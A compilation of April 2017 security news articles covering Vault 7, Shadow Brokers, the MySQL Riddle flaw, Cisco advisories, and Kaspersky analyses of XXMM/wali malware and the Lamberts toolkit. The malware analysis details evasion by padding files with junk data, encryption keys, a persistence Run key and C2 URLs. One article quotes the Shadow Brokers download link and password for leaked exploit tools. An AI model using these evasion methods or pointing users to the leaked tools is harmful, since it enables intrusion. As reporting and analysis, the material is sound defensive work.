The “heapgrd” DLL inject vulnerability was discovered and fixed in Kaspersky Lab products back in 2009. The vulnerability allowed a malefactor to load a third-party DLL instead of the WHEAPGRD.dll file and thus bypass protection. It was patched starting with Kaspersky Internet Security 9 and Kaspersky Antivirus for Workstations MP4. The products that were mentioned in relation to these vulnerabilities (Kaspersky Internet Security 7 and 8 and Kaspersky Antivirus for Workstations MP3) are outdated and no longer supported. All current Kaspersky Lab solutions are subject to mandatory testing against these vulnerabilities prior to release.

The TDSS Killer’s DLL inject vulnerability mentioned in the WikiLeaks report was fixed in 2015.

Product behavior specifics

The report also says Kaspersky Lab’s security solutions do not block DLL injections into user processes and svchost.exe. In fact, we do protect against this sort of attack — in a smarter way that elegantly combines protection and a better user experience.

Nowadays, it’s common practice for legitimate applications to inject their code into user processes. To effectively distinguish legitimate from malicious actions, track changes, and restore unwanted amendments an application may make to the system, Kaspersky Lab’s products have included the System Watcher component since 2011. System Watcher monitors all processes on a device, including svchost.exe, and is capable of detecting malicious behavior, blocking it, and rolling back malicious changes.

The report also describes several tools and malicious programs that were used to collect data and infiltrate the users’ computers. However, all of them can be neutralized with Kaspersky Lab’s products. Let’s take a closer look at them.

First, the RickyBobby fileless Trojan is allegedly not detected by Kaspersky Lab’s products, which is not the case. All personal and enterprise level products can detect this Trojan, prevent the infection, and disinfect a system that was protected by a third-party or outdated security solution.

Second, the report mentions two other malware samples (Fine Dining and Grasshopper) that allegedly are not detected by Kaspersky Lab’s products. However, the report doesn’t provide further details of the malware. We will keep investigating the issue and report the findings as soon as details are available.

That said, we are skeptical: It’s said Fine Dining relies on the aforementioned DLL inject vulnerability in TDSS Killer, which is already fixed. Also it’s worth mentioning that Kaspersky products provide multiple layers of protection — such as emulation, heuristics, System Watcher, and Automatic Exploit Prevention — including those powered by industry-leading machine learning. These technologies are capable of detecting cyberthreats proactively based on their behavior and are constantly improved to address new techniques employed by malicious actors. The analysis of the report makes us optimistic that our customers are already protected against both Fine Dining and Grasshopper.

Third, the report mentions HammerDrill, API Memcry, and Trojan Upclicker, which use a variety of techniques to try to avoid detection by the emulator technology.

Kaspersky Lab’s emulator’s history dates back to the early 90s. It’s rated one of the best in the cybersecurity industry, and it’s continuously improved. The functionality to address the described Trojan Upclicker cloaking method was included in the emulator more than a year ago, for example. The other two tools are effectively managed by the multilayer protection available in Kaspersky Lab’s products both for home users and enterprise customers.

Fourth, the report mentions an MBR File Handle component that is able to circumvent security solutions’ drivers and thus upload malware into the Master Boot Record of the operating system.

In fact, this trick is foiled by the antirootkit technology included in Kaspersky Lab products, which enables them to reliably detect and remove infections — even the most advanced bootkits.

Fifth, another tool mentioned in the report is the Bartender program, which collects data on installed software. This functionality is not malicious and is used by many legitimate applications. However, Kaspersky Lab’s products do provide protection against such activity should a user select the high security level setting.

Fun facts

The other two mentions of Kaspersky Lab in the context of malware creation are actually fun facts.

First, the tool called DriftingShadows checks if Kaspersky Lab’s products are installed on the device, and if it finds them, it does … nothing. This means that the malware creators failed to sneak past our products. They now avoid protected devices so that their malware doesn’t get caught.

Second, the documents also describe a game called “Bonus: Capture the Flag” played among malware creators. It involves attempts to create a malware sample that bypasses Kaspersky Lab’s protection. In other words, malefactors consider our products a gold standard of cybersecurity.

Wrap-up

Investigating the existing report thoroughly, we found two vulnerabilities and several other mentions of Kaspersky Lab, including discussions regarding our reports on the Duqu 2.0 and Equation cyberespionage campaigns. Both vulnerabilities were fixed quite some time ago and pose no threat to our customers. The same goes for the other malicious tools and techniques mentioned.

However, we are staying vigilant and continuously monitoring the situation. WikiLeaks may yet publish more details. In any case, we’d like to reassure customers that addressing any possible vulnerabilities will be our top priority.

No development process guarantees immediate, perfect, permanent invincibility. We are committed to constantly improving the development process, and we also make significant efforts to perfect the process of fixing newly discovered vulnerabilities.


Old Malware Tricks To Bypass Detection in the Age of Big Data
16.4.2017 Kaspersky Virus

Kaspersky Lab has been tracking a targeted attack actor’s activities in Japan and South Korea recently. This attacker has been using the XXMM malware toolkit, which was named after an original project path revealed through a pdb string inside the file: “C:\Users\123\documents\visual studio 2010\Projects\xxmm2\Release\test2.pdb”. We came across an unusual technique used by a sample which contained no pdb strings but was very similar to a variant of XXMM malware in terms of code similarity, malware functionality, crypto-algorithm, data structures and module configuration.

The malware sample we observed was named “srvhost.exe” to resemble a standard system process name. It came from one of our partners at the beginning of 2017. One of the most surprising features of the malware was its file size, which is not commonly seen in malware – it was over 100MB. According to our analysis, this malware is a Trojan loader component that activates a backdoor. We could not confirm pdb strings from this malware, however the backdoor module seems to be named “wali” by the author, according to strings from the embedded config block.

Fig. config strings with “[wali]” section

Fig. “wali.exe” name in the malware body

The wali loader decrypts the embedded wali backdoor using the “\x63” byte and a simple XOR operation. The XOR key is not only “\x63”, we confirmed others. Then, the wali backdoor module is injected into the memory of the iexplore.exe process by the loader.

What is inside the wali loader that makes it so big in size? The reason is that this sample has a very big overlay of junk data. We found more than 20 other similar samples (wali loader + overlay) using open source intelligence and by searching our malware collection using YARA rule. After removing the overlay, there were only six unique samples.

md5_payload md5_payload+overlay size
d1e24c3cc0322b22988a1ce366d702e5 8bd0ddeb11518f3eaaddc6fd82627f33 105982049
e4811950899f44f9d14a786b4c5b1faa 2871ec229804a6e872db55dafa5c9713 105997178
3e24710d7ade27316d367dd8cb2a0b1a 105996860
3e9feea893482b65a68b1feecb71cd4d 105997043
558ca7fa8ed632fa4f8c69e32888af0f 105997191
d11f7b25823ce474e30e8ab9c8d567b0 105996847
f4c3f06faf53ad2bbc047818344a2323 105997181
f7cc6a5a06cd032c6172d14c1568b976 105997102
e7492f11c88d32e1e0b43f6b29604ec8 6a5558e4ab530f9b5c2d5bcc023d3218 105997658
bb8cef31cf6211c584d245be88573e1f 105997755
Table. Some samples of 100M+ bytes wali loader + overlay
The overlay data is generated by the wali dropper when the wali loader is installed onto the victim’s machine. The following figure shows the structure of malware components and how they are related to each other:

Fig. Structure of wali modules

Wali dropper1 checks the CPU architecture. If the CPU is 64-bit, this malware decrypts the 64-bit version of the wali loader from resource id 101. Otherwise, it decrypts the 32-bit version of the wali loader from resource id 102. To extract the resource data it uses RC4 with “12345” as the cryptokey, and LZNT1 to decompress the data after that. Dropper1 creates a file named “win${random4 chr}.tmp.bat” in the current temp directory from the decrypted wali dropper2 data. Finally, it appends generated garbage data to the overlay of the dropped file and runs wali dropper2

Wali dropper2 checks if the user account has admin privileges, and decrypts the wali loader using the same algorithm and the same key as of dropper1, and creating new files using the following file paths:

%ProgramFiles%\Common Files\System\Ole DB\srvhost.exe
%appdata%\Microsoft\Windows\Start Menu\Programs\srvhost.exe
It also appends generated garbage data to the overlay as well, using the same function. Finally, it creates a registry value of “sunUpdate” in “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run” to ensure malware persistence.

Generation of Junk Data

The feature to appending junk data to the malware executable to inflate the file size is quite unique to wali dropper1 and wali dropper2. We assume that by creating a large file the authors wanted to avoid AV detection, complicate sample exchange and stay below the radar of the most commonly used YARA rules. The function that generates the junk data is shown below:

Fig. Function to create junk data (create_garbage_data).

The create_garbage_data function generates a random byte in a loop with 1,000 iterations. In every iteration it fills blocks of data of random length within certain dynamically calculated limits. After that the result of create_garbage_data is written to the overlay of the decrypted wali loader and the process is repeated 100 times. This produces junk data of ~100MB which is appended to the executable.

Fig. Loop to append the junk data to overlay.

The size of one wali loader (MD5: d1e24c3cc0322b22988a1ce366d702e5) was initially 1,124,352 bytes. The function that appends garbage produced a new malware file in a real attack (MD5: 8bd0ddeb11518f3eaaddc6fd82627f33) and the file size was increased to 105,982,049 bytes.

As the appended junk data is created dynamically and depends on random values, the size of it may vary. We have seen 100MB files as well as 50MB samples used in real world attacks. The largest we observed was a 200MB malware sample created with the same trick. This technique currently doesn’t affect detection of the malware by Kaspersky Lab products. The malware is detected as:

Trojan.Win32.Xxmm
Trojan.Win64.Xxmm
Trojan-Downloader.Win32.Xxmm
Trojan-Downloader.Win64.Xxmm
Trojan-Dropper.Win32.Xxmm
Trojan-Dropper.Win64.Xxmm
Inflating file size with garbage data is not a completely new technique. Previously polymorphic viruses and worms used this technique a lot to mix original code with garbage data spread across the malware file, sometime increasing the file size by hundreds of kilobytes and even megabytes. Certain software protectors may also insert decoy files into packed files and inflate file size up to 1MB. We have also seen executable malwares disguised as movie files and ISO files spread over torrents, which in these cases, the malware size is inflated to a few gigabytes in order to mimic true content .

What is quite unique in using this method and appending junk data to a file is that in this case this technique is used in targeted attacks and is happening after the initial infection, during the later phases of attack with the intention of increasing file size to avoid detection.

While this technique may seem inefficient in its primitive approach to bypass detection, we believe that in certain cases this malware may stay below the radar of incident responders and forensic analysts who use YARA rules to scan harddrives. The reason is that one of the common practices for YARA rule authors is to limit the size of scanned files, which is aimed mainly at improving performance of the scanning process. Large files, like the ones produced by XXMM malware, may become invisible for such rules, which is why we would like to recommend security researchers to consider this when creating rules for dropped malwares.

Indicators of Compromise

SHA256sum of samples

Wali dropper1:

9b5874a19bf112832d8e7fd1a57a2dda180ed50aa4f61126aa1b7b692e6a6665
Wali dropper2:

da05667cd1d55fa166ae7bd95335bd080fba7b53c62b0fff248ce25c59ede54a
10fca84ae22351356ead529944f85ef5d68de38024d4c5f6058468eb399cbc30
Wali loader + overlay:

1f73d3a566ab7274b3248659144f1d092c8a5fc281f69aa71b7e459b72eb6db2
24835916af9b1f77ad52ab62220314feea91d976fdacad6c942468e20c0d9ca1
303c9fabf6cff78414cebee9873040aeb9dcf6d69962bd9e0bbe1a656376ed16
3ffd5d3579bddbfd7136a6969c03673284b1c862129cfafe7a40beea1f56e790
803a5a920684a5ab1013cb73bf8581045820f9fc8130407b8f81475d91ff7704
d2126d012de7c958b1969b875876ac84871271e8466136ffd14245e0442b6fac
d7b661754cae77aa3e77c270974a3fd6bda7548d97609ac174a9ca38ee802596
dc5e8c6488f7d6f4dcfac64f8f0755eb8582df506730a1ced03b7308587cdc41
f4a07e6dcb49cb1d819c63f17a8250f6260a944e6e9a59e822e6118fb1213031
ffd45bde777b112206b698947d9d9635e626d0245eb4cfc1a9365edc36614cbe
Wali loader:

a24759369d794f1e2414749c5c11ca9099a094637b6d0b7dbde557b2357c9fcd
b55b40c537ca859590433cbe62ade84276f3f90a037d408d5ec54e8a63c4ab31
c48a2077e7d0b447abddebe5e9f7ae9f715d190603f6c35683fff31972cf04a8
725dedcd1653f0d11f502fe8fdf93d712682f77b2a0abe1962928c5333e58cae
cfcbe396dc19cb9477d840e8ad4de511ddadda267e039648693e7173b20286b1
C2 (compromised web sites) of wali:

hXXp://******essel[.]com/mt/php/tmpl/missing.php
hXXp://******essel[.]com/mt/mt-static/images/comment/s.php
hXXp://******hi[.]com/da******/hinshu/ki******/ki******.php
hXXp://******an[.]jp/_module/menu/menug/index.php
hXXp://******etop.co[.]jp/includes/firebug/index.php
hXXp://******etop.co[.]jp/phpmyadmin/themes/pmahomme/sprites.html
hXXp://******usai[.]com/ex-engine/modules/comment/queries/deleteComment.php
hXXp://******1cs[.]net/zy/images/patterns/preview/deleteComments.php
hXXp://******1cs[.]net/zy/images/colorpicker/s.php
Filename (over 50MB size):

srvhost.exe
propsyse.exe
perfcore.exe
oldb32.exe
oledb32.exe
javaup.exe


Turns Out Microsoft Has Already Patched Exploits Leaked By Shadow Brokers

15.4.2017 thehackernews Vulnerebility


The latest dump of hacking tools allegedly belonged to the NSA is believed to be the most damaging release by the Shadow Brokers till the date.
But after analyzing the disclosed exploits, Microsoft security team says most of the windows vulnerabilities exploited by these hacking tools, including EternalBlue, EternalChampion, EternalSynergy, EternalRomance and others, are already patched in the last month's Patch Tuesday update.
"Most of the exploits that were disclosed fall into vulnerabilities that are already patched in our supported products. Customers still running prior versions of these products are encouraged to upgrade to a supported offering," Microsoft Security Team said in a blog post published today.
On Good Friday, the Shadow Brokers released a massive trove of Windows hacking tools allegedly stolen from NSA that works against almost all versions of Windows, from Windows 2000 and XP to Windows 7 and 8, and their server-side variants such as Server 2000, 2003, 2008, 2008 R2 and 2012, except Windows 10 and Windows Server 2016.
The hacking exploits could give nearly anyone with technical knowledge the ability to break into millions of Windows computers and servers all over the Internet, but those which are not up-to-date.
"Of the three remaining exploits, “EnglishmanDentist”, “EsteemAudit”, and “ExplodingCan”, none reproduces on supported platforms, which means that customers running Windows 7 and more recent versions of Windows or Exchange 2010 and newer versions of Exchange are not at risk." Microsoft says.
The data dump also includes some top-secret presentations and excel sheets, indicating that the leaked exploits may have been used to hack the SWIFT banking system of several banks across the world.
Even though NSA exploits are patched, the Shadow Brokers leak is still big, which provides info on NSA targeting SWIFT Networks
CLICK TO TWEET
Hacking tool, called Eternalromance, contains an easy-to-use interface and exploits Windows systems over TCP ports 445 and 139.

The most noteworthy exploit in the Friday's dump is Eternalblue — an SMBv1 (Server Message Block 1.0) exploit that could cause older versions of Windows to execute code remotely.
Matthew Hickey, a security expert and co-founder of Hacker House, also published a video demonstration, using this exploit against a computer running Windows Server 2008 R2 SP1 and pulling off the hack in less than 2 minutes with another alleged zero-day FuzzBunch, which is being used to compromise a virtual machine running Windows Server 2008.

 

But if the company already patched this flaw last month, then how could this exploit works against an updated machine? It seems like the researcher tried this exploit against a Windows PC without installing the latest updates.
"The patches were released in last month's update, I tested on a fully patched Windows 2008 R2 SP1 (x64), so many hosts will be vulnerable - if you apply MS17-010 it should protect hosts against the attacks," Matthew clarifies during a conversation with The Hacker News.
No Acknowledgement for SMB RCE Issue by Microsoft
There's also news floating around the Internet that the "NSA has had, at a minimum, 96 days of warning," knowing that the Shadow Brokers could drop the files at any time, but the agency did not report the flaws to Microsoft.
The Intercept also reported that Microsoft told it that the company had not been contacted by any "individual or organization," in relation to the hacking tools and exploits released by the Shadow Brokers.
The vulnerabilities have already been patched by Microsoft, which acknowledges all security researchers for reporting the issues in its products, but, interesting, there are no acknowledgments for MS17-010 which patched most of the critical flaws from the Shadow Brokers dump.
It’s noteworthy, there’s no acknowledgement for recently patched MS17-10 SMB flaw on Microsoft (used in Eternalblue)
CLICK TO TWEET
This indicates that someone from the agency or linked with defense contractor might have warned the company of the SMB RCE issue.
So, only those who are still using Windows XP, which Microsoft doesn't support for very long, are at risk of getting their machines hacked.
And there is no need to panic if you use updated Windows 7, 8 or 10 (or even Windows Vista, whose support ended just last week and the issue was patched last month).
The simple advice for you is to always keep your Windows machines and servers up-to-date in order to prevent yourself from being hacked.


Watch out, the Riddle vulnerability affects some Oracle MySQL versions. Update them now
15.4.2017 securityaffairs Vulnerebility

A bug dubbed Riddle vulnerability affecting MySQL 5.5 and 5.6 clients exposed user credentials to MiTM attacks. Update to version 5.7.
A coding error dubbed The Riddle has been uncovered in the popular DBMS Oracle MySQL, the issue can be potentially exploited by attacker powering a man-in-the-middle attack to steal usernames and passwords.
“The Riddle is a critical security vulnerability found in Oracle’s MySQL 5.5 and 5.6 client database libraries. The vulnerability allows an attacker to use riddle in the middle for breaking SSL configured connection between MySQL client and server.” states the description of the flaw.“This vulnerability is a very critical security hole because it affects MySQL — a very popular SQL database — and SSL connection which is by its definition secure.”
The flaw, tracked as CVE-2017-3305, potentially exposes login credentials to eavesdropping, an attacker can capture them when a MySQL clients 5.5 and 5.6 send them to servers.
A security update released for the versions 5.5.49 and 5.6.30 failed to completely fix the bug. The experts noticed that the Versions 5.7 and later, as well as MariaDB systems, are not affected by this issue.
According to security researcher Pali Rohár, the Riddle vulnerability results for the failed attempt to patch the BACKRONYM vulnerability affecting the MySQL database. The Backronym vulnerability exposes passwords to attackers who are in a position to run a man-in-the-middle attack, even if the traffic is encrypted.
“Security update for the stable MySQL 5.5.49 and 5.6.30 versions consisted of adding a verification of security parameters after the authentication process was finished.” “Since it is done after the authentication, riddle in the middle attack together with SSL-downgrade attack can be used by the attacker to steal login data for immediate authentication and log into the MySQL server,” wrote Rohár.

Riddle vulnerability

“Ridiculous part is that MySQL client doesn’t report any SSL-related error when MySQL server declines to authenticate a user and instead reports unencrypted error message send by the server. Furthermore, the error message is controlled by the attacker, when the riddle in the middle attack is active.”

The expert suggests updating the client software to MySQL 5.7 or MariaDB, because the security updates for these applications correctly work.

The Riddle vulnerability was discovered in February, but today the bug still affect the Oracle MySql software.

“Reporting bugs to Oracle is useless (even those which are security related) if you are not an Oracle customer. They can perfectly ignore any reports and they would be very happy if nobody knew about it so they don’t have to fix the bugs,” explains Rohár.

“It looks like immediate public disclosure is the best responsible solution for the users, as it is the only way to protect them and let them know immediately what should be done if they are affected.”


Facebook Disrupts Suspected Spam Operation

15.4.2017 securityweek Social
Facebook on Friday said it disrupted an international fake account operation that was firing off inauthentic "likes" and bogus comments to win friends it would then pound with spam.

Facebook's security team spent six months fighting to neutralize what they saw as a coordinated campaign, according to Shabnam Shaik, a company security manager.

"Our systems were able to identify a large portion of this illegitimate activity -- and to remove a substantial number of inauthentic likes," Shaik said in a blog post.

"By disrupting the campaign now, we expect that we will prevent this network of spammers from reaching its end goal of sending inauthentic material to large numbers of people."

The ring used accounts in a number of countries including Bangladesh, Indonesia and Saudi Arabia.

The group tried to mask its activities with tactics like connecting with the social network through "proxy" servers to disguise where "likes," posts or other communications were originating, according to Shaik.

Facebook said the campaign aimed to trick people into connecting as friends they would later target with spam. The company said it had derailed the operation early enough to spare users that fate.

The leading social network this week said it has started weeding out bogus accounts by watching for suspicious behavior such as repetitive posts or torrents of messages.

The security improvement was described as being part of a broader effort to rid the leading social network of hoaxes, misinformation and fake news by verifying people's identities.

"We've found that when people represent themselves on Facebook the same way they do in real life, they act responsibly," Shaik said.

"Fake accounts don't follow this pattern, and are closely related to the creation and spread of spam."

Under pressure to stymie the spread of fake news, Facebook has taken a series of steps including making it easier to report such posts and harder to earn money from them.


Veteran Industrial Cybersecurity Firm PAS Raises $40 Million

15.4.2017 securityweek Cyber 
With deep roots in software solutions for process safety and asset reliability for industrial firms, Houston, TX-based PAS announced this week that it has taken a $40 Million investment that will be used to fuel its Industrial control system (ICS) cybersecurity business.

While many new startups have emerged in the industrial cybersecurity space in recent years, PAS has been around for 23 years and says its solutions are deployed in more than 1,100 facilities globally in more than 70 countries.

Previously known as Plant Automation Services, Inc. (“PAS”), the company has reorganized under the new corporate name PAS Global, and will use the investment to expand its security solutions portfolio and support global growth.

PAS Raises $40 MillionFounded by Eddie Habibi, who currently serves as CEO, the company has not taken any outside funding before.

“PAS has a 23-year tradition of making industrial process facilities safer and more reliable,” Habibi said in a statement. “Our deep expertise in control systems and production-centric approach to securing ICS give us a formidable competitive advantage.”

The company helps customers comply with regulatory standards including NERC CIP, NIST, and IEC 62443, with offerings including ICS cybersecurity, automation asset management, IPL assurance, alarm management, high performance HMI, boundary management, and control loop performance optimization.

“This funding round will expand PAS sales and marketing across its global offices as well as increase research and development for Cyber Integrity, its flagship cybersecurity software product,” the company said. “Cyber Integrity protects critical infrastructure from risks associated with rising industrial internet of things (IoT) adoption, malicious cyber attacks, and insider threats.”

The $40 million growth investment came from investment firm Tinicum, a private investment partnership focused on late stage investments in manufacturing, energy, technology, media, and infrastructure.


Shadows Brokers released another archive that suggests NSA compromised a SWIFT system
15.4.2017 securityaffairs BigBrothers

The Shadow Brokers group released a 117.9 MB encrypted dump containing documents that suggest NSA hacker SWIFT system in the Middle East.
Last week, the notorious Shadow Brokers hackers group that claimed to have stolen the hacking tools and exploits from the NSA has leaked the password for an encrypted cache of Unix hacking tools and exploits, including a remote root zero-day exploit for Solaris OS and the TOAST framework.
Today the Shadow Brokers group has released another piece of the precious archive alleged stolen to the NSA, a 117.9 MB encrypted dump, it includes three folders named Windows, Swift, and OddJob including 23 new hacking tools.

Some of the codenames for the hacking tools in the archive are OddJob, EasyBee, EternalRomance, FuzzBunch, EducatedScholar, EskimoRoll, EclipsedWing, EsteemAudit, EnglishMansDentist, MofConfig, ErraticGopher, EmphasisMine, EmeraldThread, EternalSynergy, EwokFrenzy, ZippyBeer, ExplodingCan, DoublePulsar.

The tools and exploits released today have been specifically designed to target earlier versions of Windows operating system, this last bunch of documents suggests the NSA was targeting the SWIFT banking system of several banks around the world.

The hackers published a blog post titled “Lost in Translation,” which included a link to the archive and the password.

“Follow the links for new dumps. Windows. Swift. Oddjob. Oh you thought that was it? Some of you peoples is needing reading comprehension.

https://yadi.sk/d/NJqzpqo_3GxZA4
Password = Reeeeeeeeeeeeeee
” reads the blog post.

The overall archive was now available on GitHub, including the last portion.
Of course, security researchers immediately started digging the precious trove of files.

Follow
x0rz @x0rz
Windows exploits, payloads and implants of #EquationGroup dumped by the #ShadowBrokers: confirmed.
11:44 AM - 14 Apr 2017
239 239 Retweets 206 206 likes
Follow
Hacker Fantastic @hackerfantastic
EMERALDTHREAD is an exploit (unpatched?) for Windows XP to Windows 2003 SP2.
3:04 PM - 14 Apr 2017
8 8 Retweets 7 7 likes
The hacking tools in the Windows folder work against older versions of Windows (Windows XP) and Server 2003.

The folder OddJob contains a Windows implant and includes alleged configuration files and payloads, also in this case targeted versions are older ones like Windows Server 2003 Enterprise up to Windows XP Professional.

According to the Security expert Kevin Beaumont, who analyzed the dump, some of the Windows exploits were able to avoid detection.
Segui
Kevin Beaumont ✔ @GossiTheDog
So far the first 3 exploits in Windows/Exploits haven't been on VirusTotal before, nor in Palo-Alto Autofocus.
12:45 - 14 Apr 2017
5 5 Retweet 9 9 Mi piace
But the SWIFT folder contains a PowerPoint document that could reveal a disconcerting reality. The PPT contains credentials and data on the internal architecture of EastNets, one of the largest SWIFT Service Bureau in the Middle East.
NSA hacked SWIFT
The folder includes SQL scripts that could be used to query Oracle Database to obtain a wide range of information, including the list of users and the SWIFT message queries.
NSA hacked SWIFT

The folder also contains Excel files that demonstrate the NSA’s linked Equation Group had hacked many banks worldwide, most of them in countries in the Middle East (i.e.UAE, Kuwait, Qatar, Palestine, and Yemen).

Segui
Matt Suiche ✔ @msuiche
SWIFT Host of Palestinian Bank was running Windows 2008 R2 vulnerable to exploit framework FUZZBUNCH. #ShadowBrokers cc @hackerfantastic
17:48 - 14 Apr 2017
41 41 Retweet 32 32 Mi piace
But EastNets’ CEO has denied NSA hackers ever compromised the systems of the company.
“The reports of an alleged hacker-compromised EastNets Service Bureau (ENSB) network is totally false and unfounded,” EastNets’ CEO Hazem Mulhim told Motherboard in an email. “The EastNets Network internal Security Unit has ran a complete check of its servers and found no hacker compromise or any vulnerabilities.” reads the official statement issued by the company.
“The EastNets Service Bureau runs on a separate secure network that cannot be accessed over the public networks. The photos shown on twitter, claiming compromised information, is about pages that are outdated and obsolete, generated on a low-level internal server that is retired since 2013.”

“While we cannot ascertain the information that has been published, we can confirm that no EastNets customer data has been compromised in any way”


Cisco warns of two critical issues in IOS and Apache Struts
14.4.2017 securityaffairs  Vulnerebility

Cisco issued two “critical” security advisories, one for Cisco IOS and Cisco IOS XE Software, another for a flaw affecting Apache Struts 2.
Today Cisco issued two “critical” security advisories, the first one for Cisco IOS and Cisco IOS XE Software, the second one for the recently discovered flaw affecting Apache Struts 2.

The vulnerability in Cisco IOS affects the Cisco Cluster Management Protocol (CMP) that could be exploited by an unauthenticated, remote attacker to trigger a DoS condition via a reload of the device, or remotely execute code with elevated privileges.

“A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges.” reads the Cisco Security Advisory.

According to Cisco a wide range of devices is affected by the flaw, including the Cisco Catalyst 2350-48TD-S Switch and the Cisco SM-X Layer 2/3 EtherSwitch Service Module.

“The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: The failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device, and the incorrect processing of malformed CMP-specific Telnet options.” states Cisco.

The attacker can exploit the vulnerability establishing a Telnet session with vulnerable devices and by sending malformed CMP-specific Telnet options. At the time, I was writing there is no workaround to temporary fix the problem.

“An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device,” continues the advisory.

As for the flaw in Apache Struts2, Cisco confirmed that some products using the application could be remotely hacked. The remote code execution flaw disclosed by Apache in March, tracked as CVE-2017-5638, affects the Jakarta-based file upload Multipart parser.

The IT giant is still investigating its products to determine affected products, as for now the company confirmed that Cisco SocialMiner, Identity Services Engine (ISE), Prime License Manager and others are affected.


Unraveling the Lamberts Toolkit
14.4.2017 Kaspersky Attack

Yesterday, our colleagues from Symantec published their analysis of Longhorn, an advanced threat actor that can be easily compared with Regin, ProjectSauron, Equation or Duqu2 in terms of its complexity.

Longhorn, which we internally refer to as “The Lamberts”, first came to the attention of the ITSec community in 2014, when our colleagues from FireEye discovered an attack using a zero day vulnerability (CVE-2014-4148). The attack leveraged malware we called ‘BlackLambert’, which was used to target a high profile organization in Europe.

Since at least 2008, The Lamberts have used multiple sophisticated attack tools against high-profile victims. Their arsenal includes network-driven backdoors, several generations of modular backdoors, harvesting tools, and wipers. Versions for both Windows and OSX are known at this time, with the latest samples created in 2016.

Although the operational security displayed by actors using the Lamberts toolkit is very good, one sample includes a PDB path that points to a project named “Archan~1” (perhaps ‘Archangel’). The root folder on the PDB path is named “Hudson”. This is one of the very few mistakes we’ve seen with this threat actor.

While in most cases the infection vector remains unknown, the high profile attack from 2014 used a very complex Windows TTF zero-day exploit (CVE-2014-4148).

Kaspersky Lab products successfully detect and eradicate all the known malware from the Lamberts family. For more information please contact: intelreports@kasperskycom

Figure 1. Lamberts discovery timeline

The first time the Lambert family malware was uncovered publicly was in October 2014, when FireEye posted a blog about a zero day exploit (CVE-2014-4148) used in the wild. The vulnerability was patched by Microsoft at the same time. We named the malware involved ‘Black Lambert’ and described it thoroughly in a private report, available to Kaspersky APT Intel Reports subscribers.

The authors of Black Lambert included a couple of very interesting details in the sample, which read as the following: toolType=wl, build=132914, versionName = 2.0.0. Looking for similar samples, we were able to identify another generation of related tools which we called White Lambert. While Black Lambert connects directly to its C&C for instructions, White Lambert is a fully passive, network-driven backdoor.

Black Lambert White Lambert
Implant type Active Passive
toolType wl aa (“ArchAngel”)
build 132914 113140
versionName 2.0.0 5.0.2
Internal configuration similarities in Black and White Lambert

White Lambert runs in kernel mode and intercepts network traffic on infected machines. It decrypts packets crafted in a special format to extract instructions. We named these passive backdoors ‘White Lambert’ to contrast with the active “Black Lambert” implants.

Looking further for any other malware related to White Lambert and Black Lambert, we came by another generation of malware that we called Blue Lambert.

One of the Blue Lambert samples is interesting because it appears to have been used as second stage malware in a high profile attack, which involved the Black Lambert malware.

Looking further for malware similar to Blue Lambert, we came by another family of malware we called Green Lambert. Green Lambert is a lighter, more reliable, but older version of Blue Lambert. Interestingly, while most Blue Lambert variants have version numbers in the range of 2.x, Green Lambert is mostly in 3.x versions. This stands in opposition to the data gathered from export timestamps and C&C domain activity that points to Green Lambert being considerably older than the Blue variant. Perhaps both Blue and Green Lamberts have been developed in parallel by two different teams working under the same umbrella, as normal software version iterations, with one seeing earlier deployment than the other.

Signatures created for Green Lambert (Windows) have also triggered on an OS X variant of Green Lambert, with a very low version number: 1.2.0. This was uploaded to a multiscanner service in September 2014. The OS X variant of Green Lambert is in many regards functionally identical to the Windows version, however it misses certain functionality such as running plugins directly in memory.

Kaspersky Lab detections for Blue, Black, and Green Lamberts have been triggered by a relatively small set of victims from around the world. While investigating one of these infections involving White Lambert (network-driven implant) and Blue Lambert (active implant), we found yet another family of tools that appear to be related. We called this new family Pink Lambert.

The Pink Lambert toolset includes a beaconing implant, a USB-harvesting module and a multi-platform orchestrator framework which can be used to create OS-independent malware. Versions of this particular orchestrator were found on other victims, together with White Lambert samples, indicating a close relationship between the White and Pink Lambert malware families.

By looking further for other undetected malware on victims of White Lambert, we found yet another apparently related family. The new family, which we called Gray Lambert is the latest iteration of the passive network tools from the Lamberts’ arsenal. The coding style of Gray Lambert is similar to the Pink Lambert USB-harvesting module, however, the functionality mirrors that of White Lambert. Compared to White Lambert, Gray Lambert runs in user mode, without the need for exploiting a vulnerable signed driver to load arbitrary code on 64-bit Windows variants.

Connecting all these different families by shared code, data formats, C&C servers, and victims, we have arrived at the following overarching picture:

Figure 2. An overview of connections between the Lambert families

The Lamberts in Brief – from Black to Gray

Below, we provide a small summary of all the Lamberts. A full description of all variants is available to subscribers of Kaspersky APT Reports. Contact intelreports@kaspersky.com

Black Lambert

The only known sample of Black Lambert was dropped by a TTF-exploit zero day (CVE-2014-4148). Its internal configuration included a proxy server which suggests the malware was created to work in a very specific network configuration, inside the victim’s network.

An internal description of Black Lambert indicates what appears to be a set of markers used by the attackers to denote this particular branch: toolType=wl, build=132914, versionName = 2.0.0.

Hash Description
683afdef710bf3c96d42e6d9e7275130 generic loader (hdmsvc.exe)
79e263f78e69110c09642bbb30f09ace winlib.dll, final payload (toolType=wl)
Blue Lambert

The Blue Lambert implants contain what appear to be version numbers in the 2.x range, together with project/operation codename sets, which may also indicate codenames for the victims or campaigns.

Unraveling the Lamberts Toolkit

Figure 4. Blue Lambert configuration in decrypted form, highlighting internal codenames

Known codenames include TRUE CRIME (2.2.0.2), CERVELO YARDBIRD (2.6.1.1), GAI SHU (2.2.0.5), DOUBLESIDED SCOOBYSNACK (2.3.0.2), FUNNELCAKE CARNIVAL (2.5.0.2), PROSPER SPOCK (2.0.0.2), RINGTOSS CARNIVAL (2.4.2.2), COD FISH (2.2.0.0), and INVERTED SHOT (2.6.2.3).

Green Lambert

Green Lambert is a family of tools deeply related to Blue Lambert. The functionality is very similar, both Blue and Green are active implants. The configuration data shares the same style of codenames for victims, operations, or projects.

Unraveling the Lamberts Toolkit

Figure 5. Green Lambert configuration block (decrypted) highlighting internal codenames

